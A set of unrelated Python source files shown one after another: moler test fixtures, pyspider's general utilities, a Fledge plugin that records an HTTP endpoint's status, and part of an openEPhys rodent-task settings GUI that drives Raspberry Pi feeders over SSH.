failing_detector = FailingNetworkDownDetector(connection=moler_conn, runner=runner)
yield failing_detector
# remove exceptions collected inside ConnectionObserver
ConnectionObserver.get_unraised_exceptions(remove=True)
@pytest.fixture()
def observer_and_awaited_data(connection_observer):
awaited_data = 'ping: sendmsg: Network is unreachable'
return connection_observer, awaited_data
@pytest.fixture(scope='module', autouse=True)
def use_loud_event_loop():
from moler.asyncio_runner import LoudEventLoopPolicy
loud_policy = LoudEventLoopPolicy()
asyncio.set_event_loop_policy(loud_policy)
@pytest.yield_fixture()
def event_loop():
from moler.asyncio_runner import cancel_remaining_feeders
loop = asyncio.get_event_loop_policy().new_event_loop()
yield loop
# event_loop fixture is autoloaded by @pytest.mark.asyncio decorator
# and inside some of our async tests we just submit() observer inside runner without stopping it
# so, we need to stop all submitted futures
cancel_remaining_feeders(loop)
loop.close()
|
utils.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2012-11-06 11:50:13
import math
import sys
import codecs
import logging
import hashlib
import datetime
import pickle
import socket
import base64
import warnings
import threading
import six
from six import iteritems
md5string = lambda x: hashlib.md5(utf8(x)).hexdigest()
class ReadOnlyDict(dict):
"""A Read Only Dict"""
def __setitem__(self, key, value):
raise Exception("dict is read-only")
def getitem(obj, key=0, default=None):
"""Get first element of list or return default"""
try:
return obj[key]
except:
return default
def hide_me(tb, g=globals()):
"""Hide stack traceback of given stack"""
base_tb = tb
try:
while tb and tb.tb_frame.f_globals is not g:
tb = tb.tb_next
while tb and tb.tb_frame.f_globals is g:
tb = tb.tb_next
except Exception as e:
logging.exception(e)
tb = base_tb
if not tb:
tb = base_tb
return tb
def run_in_thread(func, *args, **kwargs):
"""Run function in thread, return a Thread object"""
from threading import Thread
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def run_in_subprocess(func, *args, **kwargs):
"""Run function in subprocess, return a Process object"""
from multiprocessing import Process
thread = Process(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def format_date(date, gmt_offset=0, relative=True, shorter=False, full_format=False):
"""Formats the given date (which should be GMT).
By default, we return a relative time (e.g., "2 minutes ago"). You
can return an absolute date string with ``relative=False``.
You can force a full format date ("July 10, 1980") with
``full_format=True``.
This method is primarily intended for dates in the past.
For dates in the future, we fall back to full format.
From tornado
"""
if not date:
return '-'
if isinstance(date, float) or isinstance(date, int):
date = datetime.datetime.utcfromtimestamp(date)
now = datetime.datetime.utcnow()
if date > now:
if relative and (date - now).seconds < 60:
# Due to click skew, things are some things slightly
# in the future. Round timestamps in the immediate
# future down to now in relative mode.
date = now
else:
# Otherwise, future dates always use the full format.
full_format = True
local_date = date - datetime.timedelta(minutes=gmt_offset)
local_now = now - datetime.timedelta(minutes=gmt_offset)
local_yesterday = local_now - datetime.timedelta(hours=24)
difference = now - date
seconds = difference.seconds
days = difference.days
format = None
if not full_format:
ret_, fff_format = fix_full_format(days, seconds, relative, shorter, local_date, local_yesterday)
format = fff_format
if ret_:
return format
else:
format = format
if format is None:
format = "%(month_name)s %(day)s, %(year)s" if shorter else \
"%(month_name)s %(day)s, %(year)s at %(time)s"
str_time = "%d:%02d" % (local_date.hour, local_date.minute)
return format % {
"month_name": local_date.strftime('%b'),
"weekday": local_date.strftime('%A'),
"day": str(local_date.day),
"year": str(local_date.year),
"month": local_date.month,
"time": str_time
}
def fix_full_format(days, seconds, relative, shorter, local_date, local_yesterday):
if relative and days == 0:
if seconds < 50:
return True, (("1 second ago" if seconds <= 1 else
"%(seconds)d seconds ago") % {"seconds": seconds})
if seconds < 50 * 60:
minutes = round(seconds / 60.0)
return True, (("1 minute ago" if minutes <= 1 else
"%(minutes)d minutes ago") % {"minutes": minutes})
hours = round(seconds / (60.0 * 60))
return True, (("1 hour ago" if hours <= 1 else
"%(hours)d hours ago") % {"hours": hours})
format = None
if days == 0:
format = "%(time)s"
elif days == 1 and local_date.day == local_yesterday.day and \
relative:
format = "yesterday" if shorter else "yesterday at %(time)s"
elif days < 5:
format = "%(weekday)s" if shorter else "%(weekday)s at %(time)s"
elif days < 334: # 11mo, since confusing for same month last year
format = "%(month)s-%(day)s" if shorter else \
"%(month)s-%(day)s at %(time)s"
return False, format
class TimeoutError(Exception):
pass
try:
import signal
if not hasattr(signal, 'SIGALRM'):
raise ImportError('signal')
class timeout:
"""
Time limit of command
with timeout(3):
time.sleep(10)
"""
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
if not isinstance(threading.current_thread(), threading._MainThread):
logging.warning("timeout only works on main thread, are you running pyspider in threads?")
self.seconds = 0
if self.seconds:
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(int(math.ceil(self.seconds)))
def __exit__(self, type, value, traceback):
if self.seconds:
signal.alarm(0)
except ImportError as e:
warnings.warn("timeout is not supported on your platform.", FutureWarning)
class timeout:
"""
Time limit of command (for windows)
"""
def __init__(self, seconds=1, error_message='Timeout'):
pass
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def utf8(string):
"""
Make sure string is utf8 encoded bytes.
If parameter is a object, object.__str__ will been called before encode as bytes
"""
if isinstance(string, six.text_type):
return string.encode('utf8')
elif isinstance(string, six.binary_type):
return string
else:
return six.text_type(string).encode('utf8')
def text(string, encoding='utf8'):
"""
Make sure string is unicode type, decode with given encoding if it's not.
If parameter is a object, object.__str__ will been called
"""
if isinstance(string, six.text_type):
return string
elif isinstance(string, six.binary_type):
return string.decode(encoding)
else:
return six.text_type(string)
def pretty_unicode(string):
"""
Make sure string is unicode, try to decode with utf8, or unicode escaped string if failed.
"""
if isinstance(string, six.text_type):
return string
try:
return string.decode("utf8")
except UnicodeDecodeError:
return string.decode('Latin-1').encode('unicode_escape').decode("utf8")
def unicode_string(string):
"""
Make sure string is unicode, try to default with utf8, or base64 if failed.
can been decode by `decode_unicode_string`
"""
if isinstance(string, six.text_type):
return string
try:
return string.decode("utf8")
except UnicodeDecodeError:
return '[BASE64-DATA]' + base64.b64encode(string) + '[/BASE64-DATA]'
def unicode_dict(_dict):
"""
Make sure keys and values of dict is unicode.
"""
r = {}
for k, v in iteritems(_dict):
r[unicode_obj(k)] = unicode_obj(v)
return r
def unicode_list(_list):
"""
Make sure every element in list is unicode. bytes will encode in base64
"""
return [unicode_obj(x) for x in _list]
def unicode_obj(obj):
"""
Make sure keys and values of dict/list/tuple is unicode. bytes will encode in base64.
Can been decode by `decode_unicode_obj`
"""
if isinstance(obj, dict):
return unicode_dict(obj)
elif isinstance(obj, (list, tuple)):
return unicode_list(obj)
elif isinstance(obj, six.string_types):
return unicode_string(obj)
elif isinstance(obj, (int, float)):
return obj
elif obj is None:
return obj
else:
try:
return text(obj)
except:
try:
return '[BASE64-DATA]' + codecs.encode(obj, 'base64').decode() + '[/BASE64-DATA]'
except:
return text(repr(obj))
def decode_unicode_string(string):
"""
Decode string encoded by `unicode_string`
"""
if string.startswith('[BASE64-DATA]') and string.endswith('[/BASE64-DATA]'):
return base64.b64decode(string[len('[BASE64-DATA]'):-len('[/BASE64-DATA]')])
return string
def decode_unicode_obj(obj):
"""
Decode unicoded dict/list/tuple encoded by `unicode_obj`
"""
if isinstance(obj, dict):
r = {}
for k, v in iteritems(obj):
r[decode_unicode_string(k)] = decode_unicode_obj(v)
return r
elif isinstance(obj, six.string_types):
return decode_unicode_string(obj)
elif isinstance(obj, (list, tuple)):
return [decode_unicode_obj(x) for x in obj]
else:
return obj
class Get(object):
"""
Lazy value calculate for object
"""
def __init__(self, getter):
self.getter = getter
def __get__(self, instance, owner):
return self.getter()
class ObjectDict(dict):
"""
Object like dict, every dict[key] can visite by dict.key
If dict[key] is `Get`, calculate it's value.
"""
def __getattr__(self, name):
ret = self.__getitem__(name)
if hasattr(ret, '__get__'):
return ret.__get__(self, ObjectDict)
return ret
def load_object(name):
"""Load object from module"""
if "." not in name:
raise Exception('load object need module.object')
module_name, object_name = name.rsplit('.', 1)
if six.PY2:
module = __import__(module_name, globals(), locals(), [utf8(object_name)], -1)
else:
module = __import__(module_name, globals(), locals(), [object_name])
return getattr(module, object_name)
def get_python_console(namespace=None):
"""
Return a interactive python console instance with caller's stack
"""
if namespace is None:
import inspect
frame = inspect.currentframe()
caller = frame.f_back
if not caller:
logging.error("can't find caller who start this console.")
caller = frame
namespace = dict(caller.f_globals)
namespace.update(caller.f_locals)
try:
from IPython.terminal.interactiveshell import TerminalInteractiveShell
shell = TerminalInteractiveShell(user_ns=namespace)
except ImportError:
try:
import readline
import rlcompleter
readline.set_completer(rlcompleter.Completer(namespace).complete)
readline.parse_and_bind("tab: complete")
except ImportError:
pass
import code
shell = code.InteractiveConsole(namespace)
shell._quit = False
def exit():
shell._quit = True
def readfunc(prompt=""):
if shell._quit:
raise EOFError
return six.moves.input(prompt)
# inject exit method
shell.ask_exit = exit
shell.raw_input = readfunc
return shell
def python_console(namespace=None):
"""Start a interactive python console with caller's stack"""
if namespace is None:
import inspect
frame = inspect.currentframe()
caller = frame.f_back
if not caller:
logging.error("can't find caller who start this console.")
caller = frame
namespace = dict(caller.f_globals)
namespace.update(caller.f_locals)
return get_python_console(namespace=namespace).interact()
def check_port_open(port, addr='127.0.0.1'):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((addr, port))
if result == 0:
return True
else:
return False
def pickle_loads(data):
return pickle.loads(codecs.decode(data.encode(), 'base64'))
def pickle_dumps(data):
return codecs.encode(pickle.dumps(data), 'base64').decode()
def get_project_name(obj):
return sys.modules[obj.__module__].__name__.split('.')[0]
|
http-status.py | # -*- coding: utf-8 -*-
# FLEDGE_BEGIN
# See: http://fledge-iot.readthedocs.io/
# FLEDGE_END
""" Weather report from OpenWeatherMap async plugin """
import copy
import asyncio
import json
import logging
from threading import Thread
from aiohttp import web
from fledge.common import logger
from fledge.plugins.common import utils
import async_ingest
import pycurl
__author__ = "Mark Riddoch, Ashwin Gopalakrishnan, Amarendra K Sinha"
__copyright__ = "Copyright (c) 2018 Dianomic Systems"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
_DEFAULT_CONFIG = {
'plugin': {
'description': 'HTTP Status check',
'type': 'string',
'default': 'http-status',
'readonly': 'true'
},
'url': {
'description': 'API URL to fetch information',
'type': 'string',
'default': 'https://www.univie.ac.at/',
'order': '1',
'displayName': 'API URL',
'mandatory': 'true'
},
'assetName': {
'description': 'Asset Name',
'type': 'string',
'default': 'http-status',
'order': '2',
'displayName': 'Asset Name',
'mandatory': 'true'
},
'rate': {
'description': 'Rate at which to send requests in seconds',
'type': 'integer',
'default': '10',
'minimum': '1',
'order': '3',
'displayName': 'Request Interval'
},
'pkiFile': {
'description': 'Path to the p12 certificate file. (OPTIONAL)',
'type': 'string',
'order': '4',
'default': '',
'displayName': 'Certificate P12 file'
},
'pkiPasswd': {
'description': 'Password for the certificate (OPTIONAL)',
'type': 'string',
'default': '',
'order': '5',
'displayName': 'Cert Password'
}
}
_LOGGER = logger.setup(__name__, level=logging.DEBUG)
c_callback = None
c_ingest_ref = None
loop = None
t = None
task = None
def plugin_info():
""" Returns information about the plugin.
Args:
Returns:
dict: plugin information
Raises:
"""
return {
'name': 'HTTP Status',
'version': '1.9.1',
'mode': 'async',
'type': 'south',
'interface': '1.0',
'config': _DEFAULT_CONFIG
}
def plugin_init(config):
""" Initialise the plugin with WeatherReport class' object that will periodically fetch weather data
Args:
config: JSON configuration document for the South plugin configuration category
Returns:
data: JSON object to be used in future calls to the plugin
Raises:
"""
data = copy.deepcopy(config)
return data
def plugin_start(handle):
global loop, t, task
loop = asyncio.new_event_loop()
try:
url = handle['url']['value']
rate = handle['rate']['value']
asset_name = handle['assetName']['value']
cert_file = handle['pkiFile']['value']
cert_pwd = handle['pkiPasswd']['value']
task = WeatherReport(url, rate, asset_name, cert_file, cert_pwd)
task.start()
def run():
global loop
loop.run_forever()
t = Thread(target=run)
t.start()
except Exception as e:
_LOGGER.exception("OpenWeatherMap plugin failed to start. Details %s", str(e))
raise
def plugin_reconfigure(handle, new_config):
""" Reconfigures the plugin
it should be called when the configuration of the plugin is changed during the operation of the south service.
The new configuration category should be passed.
Args:
handle: handle returned by the plugin initialisation call
new_config: JSON object representing the new configuration category for the category
Returns:
new_handle: new handle to be used in the future calls
Raises:
"""
_LOGGER.info("Old config for OpenWeatherMap plugin {} \n new config {}".format(handle, new_config))
plugin_shutdown(handle)
new_handle = plugin_init(new_config)
plugin_start(new_handle)
return new_handle
def plugin_shutdown(handle):
try:
_LOGGER.info('South http-status plugin shutting down.')
task.stop()
loop.stop()
except Exception as e:
_LOGGER.exception(str(e))
raise
def plugin_register_ingest(handle, callback, ingest_ref):
"""Required plugin interface component to communicate to South C server
Args:
handle: handle returned by the plugin initialisation call
callback: C opaque object required to passed back to C->ingest method
ingest_ref: C opaque object required to passed back to C->ingest method
"""
global c_callback, c_ingest_ref
c_callback = callback
c_ingest_ref = ingest_ref
_LOGGER.debug(f': register ingest: {callback}, {ingest_ref}')
class WeatherReport(object):
""" Handle integration with OpenWeatherMap API """
__slots__ = ['_interval', 'url', 'asset_name', '_handler', 'cert_file', 'cert_pwd']
def __init__(self, url, rate, asset_name, cert_file, cert_pwd):
self._interval = float(rate)
self.url = url
self.asset_name = asset_name
self.cert_file = cert_file
self.cert_pwd = cert_pwd
self._handler = None
_LOGGER.debug(": init----")
def _run(self):
_LOGGER.debug(f'run {self.url}')
self.fetch()
_LOGGER.debug('run fetch end')
self._handler = loop.call_later(self._interval, self._run)
def start(self):
_LOGGER.debug('start')
self._handler = loop.call_later(self._interval, self._run)
def stop(self):
self._handler.cancel()
def fetch(self):
try:
err = ''
c = pycurl.Curl()
try:
c.setopt(c.URL, self.url)
if self.cert_file and self.cert_pwd:
c.setopt(pycurl.SSLCERTTYPE, 'P12')
c.setopt(pycurl.KEYPASSWD, self.cert_pwd)
c.setopt(pycurl.SSLCERT, self.cert_file)
c.perform()
except Exception as ex:
status = 999
time = 0
err = str(ex)
else:
status = c.getinfo(c.HTTP_CODE)
time = c.getinfo(c.TOTAL_TIME)
err = ""
data = {
'asset': self.asset_name,
'timestamp': utils.local_timestamp(),
'readings': [{'status': status,
'time': time,
'error': err,
'url': self.url}]
}
_LOGGER.debug(f'status: ----{data}')
async_ingest.ingest_callback(c_callback, c_ingest_ref, data)
_LOGGER.debug(f'status: ----{status}')
except Exception as ex:
err = "Unable to fetch information from api.openweathermap: {}".format(str(ex))
_LOGGER.error(err)
|
Task.py | # This is a task
import numpy as np
from threading import Lock, Thread
from openEPhys_DACQ.RPiInterface import RewardControl
from time import time, sleep
from scipy.spatial.distance import euclidean
import random
from PyQt5 import QtWidgets, QtGui
import warnings
from copy import copy, deepcopy
from openEPhys_DACQ.audioSignalGenerator import createAudioSignal
from openEPhys_DACQ.sshScripts import ssh
from openEPhys_DACQ.HelperFunctions import show_message
import contextlib
with contextlib.redirect_stdout(None):
import pygame
def init_pygame():
pygame.mixer.pre_init(48000, -16, 2) # This is necessary for sound to work
pygame.init()
def close_pygame():
pygame.mixer.quit()
pygame.quit()
def activate_feeder(feeder_type, RPiIPBox, RPiUsernameBox, RPiPasswordBox, quantityBox):
ssh_connection = ssh(str(RPiIPBox.text()), str(RPiUsernameBox.text()), str(RPiPasswordBox.text()))
if feeder_type == 'milk':
command = 'python milkFeederController.py --openValve ' + str(float(str(quantityBox.text())))
elif feeder_type == 'pellet':
command = 'python pelletFeederController.py --releasePellet ' + str(int(str(quantityBox.text())))
else:
raise Exception('Unknown feeder_type {}'.format(feeder_type))
ssh_connection.sendCommand(command)
ssh_connection.disconnect()
def set_double_h_box_stretch(hbox):
hbox.setStretch(0, 2)
hbox.setStretch(1, 1)
return hbox
def set_triple_h_box_stretch(hbox):
hbox.setStretch(0, 3)
hbox.setStretch(1, 1)
hbox.setStretch(2, 1)
return hbox
def set_quadruple_h_box_stretch(hbox):
hbox.setStretch(0, 2)
hbox.setStretch(1, 1)
hbox.setStretch(2, 1)
hbox.setStretch(3, 1)
return hbox
def play_audio_signal(frequency, frequency_band_width, modulation_frequency, duration=2):
if type(frequency) == QtWidgets.QLineEdit:
frequency = np.int64(float(str(frequency.text())))
if type(frequency_band_width) == QtWidgets.QLineEdit:
frequency_band_width = np.int64(float(str(frequency_band_width.text())))
if type(modulation_frequency) == QtWidgets.QLineEdit:
modulation_frequency = np.int64(float(str(modulation_frequency.text())))
# Initialize pygame for playing sound
init_pygame()
# Get sound
sound = createAudioSignal(frequency, frequency_band_width, modulation_frequency)
# Play duration seconds of the sound
sound.play(-1, maxtime=(duration * 1000))
sleep(duration)
close_pygame()
def distance_from_segment(point, seg_p1, seg_p2):
"""
Computes distance of numpy array point from a segment defined by two numpy array points
seg_p1 and seg_p2.
"""
return np.cross(seg_p2 - seg_p1, point - seg_p1) / np.linalg.norm(seg_p2 - seg_p1)
def distance_from_boundaries(point, arena_size):
# North wall
seg_1_p1 = np.array([0, 0]).astype(np.float64)
seg_1_p2 = np.array([arena_size[0], 0]).astype(np.float64)
# East wall
seg_2_p1 = np.array([arena_size[0], 0]).astype(np.float64)
seg_2_p2 = np.array([arena_size[0], arena_size[1]]).astype(np.float64)
# South wall
seg_3_p1 = np.array([arena_size[0], arena_size[1]]).astype(np.float64)
seg_3_p2 = np.array([0, arena_size[1]]).astype(np.float64)
# West wall
seg_4_p1 = np.array([0, arena_size[1]]).astype(np.float64)
seg_4_p2 = np.array([0, 0]).astype(np.float64)
# List of walls
segments = [[seg_1_p1, seg_1_p2], [seg_2_p1, seg_2_p2],
[seg_3_p1, seg_3_p2], [seg_4_p1, seg_4_p2]]
# Find minimum distance from all walls
distances = []
for seg_p1, seg_p2 in segments:
distances.append(distance_from_segment(point, seg_p1, seg_p2))
distance = min(distances)
return distance
class SettingsGUI(object):
def __init__(self, main_settings_layout, further_settings_layout, arena_size):
"""
main_settings_layout - QtWidgets VBox Layout
further_settings_layout - QtWidgets HBox Layout
arena_size - list or numpy array of x and y size of the arena
"""
# Create empty settings variables
self.arena_size = arena_size
self.settings = {'FEEDERs': {'pellet': [], 'milk': []}}
# Create GUI size requirements
self.min_size = [0, 0]
# Create empty button groups dictionary
self.button_groups = {}
# Create settings menu
self.populate_main_settings_layout(main_settings_layout)
self.populate_further_settings_layout(further_settings_layout)
def make_space_for_frame(self, frame):
self.min_size[0] = self.min_size[0] + frame.minimumWidth()
self.min_size[1] = max(self.min_size[1], frame.minimumHeight())
def populate_main_settings_layout(self, main_settings_layout):
vbox = QtWidgets.QVBoxLayout()
font = QtGui.QFont('SansSerif', 15)
string = QtWidgets.QLabel('General Settings')
string.setFont(font)
string.setMaximumHeight(40)
vbox.addWidget(string)
# Specify which game is active Pellet, Milk or both
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Games active'))
self.settings['games_active'] = {'pellet': QtWidgets.QCheckBox('Pellet'),
'milk': QtWidgets.QCheckBox('Milk')}
self.settings['games_active']['pellet'].setChecked(True)
self.settings['games_active']['milk'].setChecked(True)
hbox.addWidget(self.settings['games_active']['pellet'])
hbox.addWidget(self.settings['games_active']['milk'])
vbox.addLayout(set_triple_h_box_stretch(hbox))
# Add option to specify how far into past to check travel distance
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Last travel time (s)'))
self.settings['LastTravelTime'] = QtWidgets.QLineEdit('2')
hbox.addWidget(self.settings['LastTravelTime'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Add smoothing factor for calculating last travel distance
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Last travel smoothing (dp)'))
self.settings['LastTravelSmooth'] = QtWidgets.QLineEdit('3')
hbox.addWidget(self.settings['LastTravelSmooth'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Add minimum distance for last travel
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Last travel min distance (cm)'))
self.settings['LastTravelDist'] = QtWidgets.QLineEdit('50')
hbox.addWidget(self.settings['LastTravelDist'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Specify pellet vs milk reward ratio
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Pellet vs Milk Reward ratio'))
self.settings['PelletMilkRatio'] = QtWidgets.QLineEdit('0.25')
hbox.addWidget(self.settings['PelletMilkRatio'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Specify raspberry pi username
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Raspberry Pi usernames'))
self.settings['Username'] = QtWidgets.QLineEdit('pi')
hbox.addWidget(self.settings['Username'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Specify raspberry pi password
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Raspberry Pi passwords'))
self.settings['Password'] = QtWidgets.QLineEdit('raspberry')
hbox.addWidget(self.settings['Password'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Put these settings into a frame
frame = QtWidgets.QFrame()
frame.setLayout(vbox)
frame.setFrameStyle(3)
# Set minimum size for frame
frame.setFixedSize(300, 300)
# Put frame into main settings layout
main_settings_layout.addWidget(frame)
self.make_space_for_frame(frame)
def populate_further_settings_layout(self, further_settings_layout):
pellet_settings_frame = self.create_pellet_task_settings()
further_settings_layout.addWidget(pellet_settings_frame)
self.make_space_for_frame(pellet_settings_frame)
milk_settings_frame = self.create_milk_task_settings()
further_settings_layout.addWidget(milk_settings_frame)
self.make_space_for_frame(milk_settings_frame)
def create_pellet_task_settings(self):
# Create Pellet task specific menu items
vbox = QtWidgets.QVBoxLayout()
font = QtGui.QFont('SansSerif', 15)
string = QtWidgets.QLabel('Pellet Game Settings')
string.setFont(font)
vbox.addWidget(string)
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Initial Pellets'))
self.settings['InitPellets'] = QtWidgets.QLineEdit('5')
hbox.addWidget(self.settings['InitPellets'])
vbox.addLayout(set_double_h_box_stretch(hbox))
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Reward Quantity'))
self.settings['PelletQuantity'] = QtWidgets.QLineEdit('1')
hbox.addWidget(self.settings['PelletQuantity'])
vbox.addLayout(set_double_h_box_stretch(hbox))
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Min Separation (s)'))
self.settings['PelletRewardMinSeparationMean'] = QtWidgets.QLineEdit('10')
hbox.addWidget(self.settings['PelletRewardMinSeparationMean'])
vbox.addLayout(set_double_h_box_stretch(hbox))
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Min Separation variance (%)'))
self.settings['PelletRewardMinSeparationVariance'] = QtWidgets.QLineEdit('0.5')
hbox.addWidget(self.settings['PelletRewardMinSeparationVariance'])
vbox.addLayout(set_double_h_box_stretch(hbox))
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Chewing Target count'))
self.settings['Chewing_Target'] = QtWidgets.QLineEdit('4')
hbox.addWidget(self.settings['Chewing_Target'])
vbox.addLayout(set_double_h_box_stretch(hbox))
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Inactivity pellet time (s)'))
self.settings['MaxInactivityDuration'] = QtWidgets.QLineEdit('90')
hbox.addWidget(self.settings['MaxInactivityDuration'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Specify chewing signal TTL channel
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Chewing TTL channel'))
self.settings['Chewing_TTLchan'] = QtWidgets.QLineEdit('5')
hbox.addWidget(self.settings['Chewing_TTLchan'])
vbox.addLayout(set_double_h_box_stretch(hbox))
# Create Pellet FEEDER items
scroll_widget = QtWidgets.QWidget()
self.pellet_feeder_settings_layout = QtWidgets.QVBoxLayout(scroll_widget)
self.addPelletFeederButton = QtWidgets.QPushButton('Add FEEDER')
self.addPelletFeederButton.clicked.connect(lambda: self.addFeedersToList('pellet'))
self.pellet_feeder_settings_layout.addWidget(self.addPelletFeederButton)
scroll = QtWidgets.QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setWidgetResizable(True)
vbox.addWidget(scroll)
# Add Pellet Task settings to task specific settings layout
frame = QtWidgets.QFrame()
frame.setLayout(vbox)
frame.setFrameStyle(3)
# Set minimum size for frame
frame.setMinimumSize(400, 900)
return frame
def create_milk_task_settings(self):
vbox = QtWidgets.QVBoxLayout()
# Create Milk task label
font = QtGui.QFont('SansSerif', 15)
string = QtWidgets.QLabel('Milk Game Settings')
string.setFont(font)
vbox.addWidget(string)
# Create top grid layout
grid = QtWidgets.QGridLayout()
vbox.addLayout(grid)
# Add initiation milk amount
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Initial Milk'))
self.settings['InitMilk'] = QtWidgets.QLineEdit('2')
hbox.addWidget(self.settings['InitMilk'])
grid.addLayout(set_double_h_box_stretch(hbox), 0, 0)
# Specify audio signal mode
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Audio Signal Mode'))
self.settings['AudioSignalMode'] = {'ambient': QtWidgets.QRadioButton('Ambient'),
'localised': QtWidgets.QRadioButton('Localised')}
self.settings['AudioSignalMode']['ambient'].setChecked(True)
hbox.addWidget(self.settings['AudioSignalMode']['ambient'])
hbox.addWidget(self.settings['AudioSignalMode']['localised'])
self.button_groups['AudioSignalMode'] = QtWidgets.QButtonGroup()
self.button_groups['AudioSignalMode'].addButton(self.settings['AudioSignalMode']['ambient'])
self.button_groups['AudioSignalMode'].addButton(self.settings['AudioSignalMode']['localised'])
grid.addLayout(set_triple_h_box_stretch(hbox), 1, 0)
# Add Milk reward quantity
self.settings['MilkQuantity'] = {}
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Reward Quantity'))
sub_hbox = QtWidgets.QHBoxLayout()
sub_hbox.addWidget(QtWidgets.QLabel('present'))
self.settings['MilkQuantity']['presentation'] = QtWidgets.QLineEdit('1')
sub_hbox.addWidget(self.settings['MilkQuantity']['presentation'])
hbox.addLayout(set_double_h_box_stretch(sub_hbox))
sub_hbox = QtWidgets.QHBoxLayout()
sub_hbox.addWidget(QtWidgets.QLabel('repeat'))
self.settings['MilkQuantity']['repeat'] = QtWidgets.QLineEdit('1')
sub_hbox.addWidget(self.settings['MilkQuantity']['repeat'])
hbox.addLayout(set_double_h_box_stretch(sub_hbox))
grid.addLayout(set_triple_h_box_stretch(hbox), 2, 0)
# Specify light signal pins to use, separated by comma
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Light Signal Pin(s)'))
self.settings['lightSignalPins'] = QtWidgets.QLineEdit('1')
hbox.addWidget(self.settings['lightSignalPins'])
grid.addLayout(set_double_h_box_stretch(hbox), 3, 0)
# Specify light signal settings regarding repeating trials
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Light Signal On'))
self.settings['LightSignalOnRepetitions'] = {'presentation': QtWidgets.QCheckBox('present'),
'repeat': QtWidgets.QCheckBox('repeat')}
self.settings['LightSignalOnRepetitions']['presentation'].setChecked(True)
hbox.addWidget(self.settings['LightSignalOnRepetitions']['presentation'])
hbox.addWidget(self.settings['LightSignalOnRepetitions']['repeat'])
grid.addLayout(set_triple_h_box_stretch(hbox), 4, 0)
# Specify probability that light signal does turn on
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Light Signal probability (0 - 1)'))
self.settings['lightSignalProbability'] = QtWidgets.QLineEdit('1')
hbox.addWidget(self.settings['lightSignalProbability'])
grid.addLayout(set_double_h_box_stretch(hbox), 5, 0)
# Specify light signal intensity
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Light Signal intensity (0 - 100)'))
self.settings['lightSignalIntensity'] = QtWidgets.QLineEdit('100')
hbox.addWidget(self.settings['lightSignalIntensity'])
grid.addLayout(set_double_h_box_stretch(hbox), 6, 0)
# Specify light signal delay relative to trial start
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Light Signal delay (s)'))
self.settings['lightSignalDelay'] = QtWidgets.QLineEdit('0')
hbox.addWidget(self.settings['lightSignalDelay'])
grid.addLayout(set_double_h_box_stretch(hbox), 7, 0)
# Option to set duration of negative audio feedback
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Negative Audio Feedback (s)'))
self.settings['NegativeAudioSignal'] = QtWidgets.QLineEdit('0')
hbox.addWidget(self.settings['NegativeAudioSignal'])
grid.addLayout(set_double_h_box_stretch(hbox), 8, 0)
# Specify milk trial fail penalty duration
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Milk Trial Fail Penalty (s)'))
self.settings['MilkTrialFailPenalty'] = QtWidgets.QLineEdit('10')
hbox.addWidget(self.settings['MilkTrialFailPenalty'])
grid.addLayout(set_double_h_box_stretch(hbox), 9, 0)
# Specify milk trial mean separation
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Min Separation (s)'))
self.settings['MilkTrialMinSeparationMean'] = QtWidgets.QLineEdit('40')
hbox.addWidget(self.settings['MilkTrialMinSeparationMean'])
grid.addLayout(set_double_h_box_stretch(hbox), 0, 1)
# Specify milk trial separation variance
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(QtWidgets.QLabel('Min Separation variance (%)'))
